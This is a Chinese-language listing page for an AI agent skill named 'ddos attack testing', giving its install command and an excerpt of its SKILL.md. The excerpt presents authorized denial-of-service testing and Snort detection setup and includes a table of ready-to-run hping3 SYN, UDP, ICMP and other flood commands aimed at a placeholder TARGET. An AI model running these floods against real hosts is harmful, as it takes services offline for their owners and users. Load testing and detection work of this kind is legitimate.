·ddos attack testing
</>

ddos attack testing

当用户要求“测试 DDoS 漏洞”、“执行拒绝服务测试”、“模拟流量洪流”、“评估网络弹性”、“配置 DDoS 检测规则”或“分析 DoS 攻击模式”时,应使用此技能。它提供了用于授权 DDoS 测试和检测配置的全面技术。

6安装·0热度·@zebbern

安装

$npx skills add https://github.com/zebbern/secops-cli-guides --skill ddos attack testing

如何安装 ddos attack testing

通过命令行快速安装 ddos attack testing AI 技能到你的开发环境

  1. 打开终端: 打开你的终端或命令行工具(如 Terminal、iTerm、Windows Terminal 等)
  2. 运行安装命令: 复制并运行以下命令:npx skills add https://github.com/zebbern/secops-cli-guides --skill ddos attack testing
  3. 验证安装: 安装完成后,技能将自动配置到你的 AI 编程环境中,可以在 Claude Code、Cursor 或 OpenClaw 中使用

来源:zebbern/secops-cli-guides。

SKILL.md

查看原文

Conduct authorized denial of service testing to assess network resilience and configure intrusion detection systems (IDS) to detect and alert on various DoS attack patterns. This skill covers volume-based, protocol-based, and application-layer attacks using command-line and GUI tools, along with Snort IDS rule configuration for detection.

| SYN | -S | TCP SYN flag | | ACK | -A | TCP ACK flag | | FIN | -F | TCP FIN flag | | RST | -R | TCP RST flag | | PSH | -P | TCP PSH flag | | URG | -U | TCP URG flag | | UDP | --udp | Use UDP protocol | | ICMP | --icmp | Use ICMP protocol |

| SYN Flood | hping3 -S --flood -p 80 TARGET | | UDP Flood | hping3 --udp --flood -p 80 TARGET | | ICMP Flood | hping3 --icmp --flood TARGET | | SYN-FIN | hping3 -SF --flood -p 80 TARGET | | PSH-ACK | hping3 -PA --flood -p 80 TARGET | | RST Flood | hping3 -R --flood -p 80 TARGET | | FIN Flood | hping3 -F --flood -p 80 TARGET |

可引用信息

为搜索与 AI 引用准备的稳定字段与命令。

安装命令
npx skills add https://github.com/zebbern/secops-cli-guides --skill ddos attack testing
分类
</>开发工具
认证
收录时间
2026-02-22
更新时间
2026-03-10

Browse more skills from zebbern/secops-cli-guides

快速解答

什么是 ddos attack testing?

当用户要求“测试 DDoS 漏洞”、“执行拒绝服务测试”、“模拟流量洪流”、“评估网络弹性”、“配置 DDoS 检测规则”或“分析 DoS 攻击模式”时,应使用此技能。它提供了用于授权 DDoS 测试和检测配置的全面技术。 来源:zebbern/secops-cli-guides。

如何安装 ddos attack testing?

打开你的终端或命令行工具(如 Terminal、iTerm、Windows Terminal 等) 复制并运行以下命令:npx skills add https://github.com/zebbern/secops-cli-guides --skill ddos attack testing 安装完成后,技能将自动配置到你的 AI 编程环境中,可以在 Claude Code、Cursor 或 OpenClaw 中使用

这个 Skill 的源码在哪?

https://github.com/zebbern/secops-cli-guides